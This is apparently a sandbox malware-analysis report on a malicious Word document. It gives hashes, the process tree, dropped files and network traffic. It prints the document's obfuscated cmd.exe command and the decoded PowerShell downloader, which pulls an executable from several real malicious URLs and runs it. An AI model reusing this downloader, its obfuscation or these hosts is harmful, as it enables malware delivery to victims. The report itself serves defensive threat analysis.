File name: | eb9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1 |
Full analysis: | https://app.any.run/tasks/3eccc753-144d-42dd-8a10-99279ab20111 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 06:39:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: James-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 3 22:03:00 2018, Last Saved Time/Date: Wed Oct 3 22:03:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 31, Security: 0 |
MD5: | C0B61D9AEB83F0C859A858E6699F1256 |
SHA1: | 69871036BD44D60177D330972B99329C4B744D11 |
SHA256: | EB9AD5BCD11C4E92E686D8F464EBCA05F43EA16D123414C0FFFCAD88DD8FD5B1 |
SSDEEP: | 1536:XptJlmrJpmxlRw99NBp+aVKBADqAoeNQ+Au9nCMhoIsSQjZ8HHiQAt:5te2dw99fCWn5N32xKiQA |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: | - |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 35 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 31 |
Words: | 5 |
Pages: | 1 |
ModifyDate: | 2018:10:03 21:03:00 |
CreateDate: | 2018:10:03 21:03:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | James-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\eb9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2200 | cmd /V^:/C"^s^e^t ^7^a^Q=^q^|^h^ ^sc^Y^ ^_^<^B^ ^H^P^'^ ^7^Bl^ ^8n^'^ ^zN^X^ ~^a^=^ Vn^K^ ^3^.^A^ N^I^|^ a^9^l^ ^E^=^k^ ^p^x^8^ ^.^P^&^ ^>^a^Q^ ^Jq)^ r^m^}^}cC^ ^}^s^@^{^{^,^4^t^h^S^6^\c^2^j^+^t^a^F^|^a^KN^:c^4^1^I^}^J^g^_^;^s^bnk^@^U^[^a^M^A^He^u^'^Ur)^yu^b^.^&^_^;^0n^F^jt^G-^o%v^Y^m;F^T^$^B^>^:^ ^i^z^9^m^O^k^a^e^g^'^Xtv^K^x^I^PC^p^-^*(^x^e9a^ ^k^8^X[^o^f^z^{v^ktvn^o)^P^I^f^bC^;^E^ ^*)^'^o^s^jN^t%^o^P^IC^m^Ek^_^$^I^f^b ^S^g^ ^,^F^`0V^]^f^Y^S^I^UPr%^i^J^$c^`^Y(^A^x^P^e^9^M^X^l^t^s^?^i^_^Sn^F^d^y#^d^&^ ^w^a^Y^>^?^o^TC^]^l^L^A^Hn^W^9^J^w^i^3^W^o^#^1^k^Dv)^b^.vC^H^d^@^J^x^z^T^M^<V^'^sX^$^|^$^=^{^6^8^z^y^IR^Dr^H^L^]^t^'^Q^9^{P~^U)^D^S^0^t^Z^~^JR^uG^8^L^w^T^X^$^P^q}^ ^6(^\n^8^`^;^i^|^;^5^ ^`^l^>V^Qs^D^S^_^$^.r^u^ n^$^K^Q^&(Y^u^=^h^{^?Vc^#^\p^a^P^ ^s^e^k^#^Fr^3(^O^o^a^ ^o^f^'^$^B^;^&bJ^'^wRv^e^6%r^x^ %^de^x^K^`^.r^F^-^'^D^U^?^+^z^@8^o^u^j^1^u^8^s^qc)(C^$^I^2^l^+^4^oR^'^O^,n^\R^$^K^'V^I/^+^D^;zcK^AL^i^*^[^i^l^:\%^b^ C^-^u^M^&^P^p^8^xR^:^[^I^hv^G^'^\n^<^o^d^e^9^k^D^$^y)^M=^g^G^d^j^M^#^Q^o^K^>^9^mo^>^M^$^~v^s^;e^W^i^'^U^Qd^9^yC^+^0^Jn^U^3^Kn^:^'%^g^Q ^?^4^O^=^p^FC^ nq^E^o^q^3^Xu^s^T^ycr^1N^$n^?^o^;^0^D^3)^6^P^w^'^K^f^.^@^A^Z^}^'^X^5*(^h(N^t^i^Gr^i^p^|Y^l^Z^m^f^p^h^J^A^Sv^k^4^.^me^5'^f^+^D^9^|_^W^s^9^0^=^G^8^y^g^f^Za^.^6^]^q%^t^&^B^0^0T^Inr^T^#^B/^HC^&a^U^i^,c^i^@^y^.^w^$^1^g^Z^?^jn^[^W^S^inR^h^km^4^p^k^`^kVn^t(^I^u^+^P^?^j^U^:^X/^<^Z^g/^Za^ ^:^*^_^@^p)^4^B^tv^m;^t^w^o^E^h^P^Q^u^@^[^y^`^9^4)^5/^ ^A^'^m^9^'^A^o^L#^~c^A^q^{^.^?^\^K^a^ 6^=^d^:^6^~n^H^<^h^a^@^o^D^k^&^j^w^a^`^,^en^@^=^_^a+^a^Tr9^g^{^mQ_^s^e^G^Q^$^l^@^F^q^a^`^a^@^.}c^+^w^B^S^2^w^l^2^p^w^?^k[/^\C^b/G^*^+^:^L^Sv^p^*/r^t^S^1%^t^$^O^0^h^a^j^{^@C^L^P^Y^e^2^W^p^K^sN^T^1^;^[^t^+^lR^U^u^0^x^s^L0^,^q^}N^e^b^4^K^O/n^g^l^m^m^2^B^o^p^$^jc^b^G^-^.^F^>^6^h^;^6/p^KR^O^t^$^a^er$/^w^o^#^P^E^p^M^x^'^s^q^F^On^F^2^s^a^\^*^]rV2^1^t^.}^D^o^S^L^I^mC^p^4^a^&^o^1^l^\ ^Ia^[+^z/^,^_^'/^4^1^P^:C^=^Q^p^d^p^>^tn^.^x^t^A^H^`^h^>^=n^@^t^A^f^tc%^s^X^$^8^Q^l^'^`^X^P^F^XN^D^x^:^[^1^a5)c^p^t^$/^s^X]^g^=^0^Mr^h^&^U^o^hX^T^.^Z^}m^eBc^ 
^g^a^K^B^a^j^u^*^m^'^I^i^a^Y^z^l^d^@^L^<r^+^j^;^e^b^=^;^t^M^p^0^a^wn^Y^w^Bc^S^e^=^W^d^l^]q^_l^7^{^G^i^z^P^jv^#^u^5n^D^I^+^o^o^*(^s^t^X^A^k^M^+^pc^b^U)^a^@)^5^j^l^0^3^.R/%^w^y^k^0^w^6^@^|^w^j%^h/^b^YR/^Q^8^x^:^1^6^3^p^Z^X^&^t^z^KL^t^#^y^m^h^,^1^4^@^3^H^+^k^6(^En^$^m^q/^#^1^D^kB^on^u^q^k^D^.^w^|^8^oc^5^gc^+^9^D^.R^f^5n^o^j^|^o^U^a^7^i^ *c^t^Bb^]^o[^s^e^m^I^4^T^o^|n^5rR^0Cp/bm^s^W^t^I^s^'^P^o^e^9^;%n^h^d^+^i^e^b^Z^s^o*^3^u^k^'^}^b^y^G^:^l^I^F/^a^us^Oc^K^I^#^o^\^JR^l(^G^T/^kNE/N^$^9^:^H^T^7^p^*^o^T^t^U^5^\^t^?^J/^h^y^_^5^'^.C^]^=^Y^E$^t%^p^{R^W^\^i^L^A^.^&^$^o^u^x^;^f^L^J^t^*^-^}n^d^;^g^e^U^$^aiR^1^`l^ln^7C^g^[^ ^b^7^G^o^e^{R^H^W^7^i^E^.^W^T^p^t^B^3^d^e^_c^4N^E^6^1^ ^4^l^z^t^X^0Vc^6^?^E^ec^5^j^j^L^>^w^b%^Q^A^o^Q^F^w-^S^W^#^w^@^~^O^e^i^<^sn^e^#^g^=^<^g^;^d^8R^e^z^~^S^PV^Er)^$n-^<^ ^x^~^0^l^&^}^o^l^tw^S^e^@^yJ^h^g_^[^sc^X^Tr^B^d^U^eC^G^E^w^-Vv^o^+^&^j^p&&^for /^L %^U ^in (^1^56^7^;^-^4^;^3)^d^o ^s^e^t v^E=!v^E!!^7^a^Q:~%^U,1!&&^i^f %^U ^l^e^q ^3 c^a^l^l %v^E:^~^-^3^9^2%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) — Note: the command line above is caret-escaped and depends on delayed variable expansion (`cmd /V:`); the `for /L %U in (1567;-4;3)` loop rebuilds the real payload backwards, one character every four positions, from the `7aQ` variable and then `call`s its last 392 characters, which is the PowerShell one-liner seen in PID 1812. Detection should key on WINWORD.EXE spawning cmd.exe/powershell.exe rather than on the obfuscated string, which is trivially re-randomised per sample. | ||||
1812 | powershell $Vzd=new-object Net.WebClient;$LRt='http://localbusinesspromotion.co.uk/nk@http://www.jacksonvillewaterdamage.org/c1DPlXt@http://alamotransportph.com/bqsUtTpY@http://www.alemranakanda.com/9@http://junkking.ca/r0t6fGs9'.Split('@');$cuo = '309';$moj=$env:public+'\'+$cuo+'.exe';foreach($rSV in $LRt){try{$Vzd.DownloadFile($rSV, $moj);Invoke-Item $moj;break;}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) — Note: this is the deobfuscated second stage. It walks five hard-coded URLs in order, saves the first successful download to `%PUBLIC%\309.exe`, launches it with `Invoke-Item` and then `break`s; any download failure is silently swallowed by the empty `catch{}`. The HTTP table shows only the first two hosts were contacted, consistent with the loop stopping once a download succeeded. | ||||
2528 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION) Version: 6.1.7600.16385 (win7_rtm.090713-1255) — Note: ntvdm.exe appears because `Invoke-Item` was given a file named `309.exe` that is not a valid PE (it is recorded as `html` in the file table); on 32-bit Windows 7 the loader hands such a file to the 16-bit subsystem, which crashed. The intended second-stage binary therefore never executed in this trace, so the absence of further activity should not be read as benign. |
PID | Process | Filename | Type | |
---|---|---|---|---|
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF7BE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NOJEAY72ZZOT73DV1RZ9.temp | — | |
MD5:— | SHA256:— | |||
2528 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsFEA.tmp | — | |
MD5:— | SHA256:— | |||
2528 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsFEB.tmp | — | |
MD5:— | SHA256:— | |||
1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2C39A189637295DD923019C1183D4B0D | SHA256:8C646733D9EAE60486E0A22F4893A17C0AE06C280488BCE0A6A697F53A565338 | |||
3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1.doc | pgc | |
MD5:F574C68E2B44F02BE40A2DD285B31378 | SHA256:CF70432D6B766E63AAD23A25D44AE7EB455BA966540EB43808CEBF0164E4EC6D | |||
1812 | powershell.exe | C:\Users\Public\309.exe | html (not a PE: the saved payload is an HTML page — most likely the 200 response from www.jacksonvillewaterdamage.org/ reached via the /c1DPlXt redirect; the payload-hosting sites had apparently stopped serving the binary by analysis time) | |
MD5:31B75F5FA0288F4873A68C41E7FE348E | SHA256:CA95BA43361559D0D99761E60BBA92DFB152BF90327FA3946A43F99B8F98B271 | |||
1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe04af.TMP | binary | |
MD5:E4D9C442DD447A8FA05F9CFE88FCBB69 | SHA256:EDD7D7597C6C79A1DFD3229A1FA23433329B1D8399EB558623FFF948D3BB4036 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1812 | powershell.exe | GET | 301 | 66.206.38.173:80 | http://localbusinesspromotion.co.uk/nk | US | html | 247 b | malicious |
1812 | powershell.exe | GET | 200 | 198.48.62.1:80 | http://www.jacksonvillewaterdamage.org/ | US | html | 30.9 Kb | unknown |
1812 | powershell.exe | GET | 301 | 198.48.62.1:80 | http://www.jacksonvillewaterdamage.org/c1DPlXt | US | — | — | unknown |
1812 | powershell.exe | GET | 404 | 66.206.38.173:80 | http://localbusinesspromotion.co.uk/nk/ | US | html | 48.2 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1812 | powershell.exe | 66.206.38.173:80 | localbusinesspromotion.co.uk | Turnkey Internet Inc. | US | malicious |
1812 | powershell.exe | 198.48.62.1:80 | www.jacksonvillewaterdamage.org | Turnkey Internet Inc. | US | unknown |
Domain | IP | Reputation |
---|---|---|
localbusinesspromotion.co.uk | 66.206.38.173 | malicious |
www.jacksonvillewaterdamage.org | 198.48.62.1 | unknown |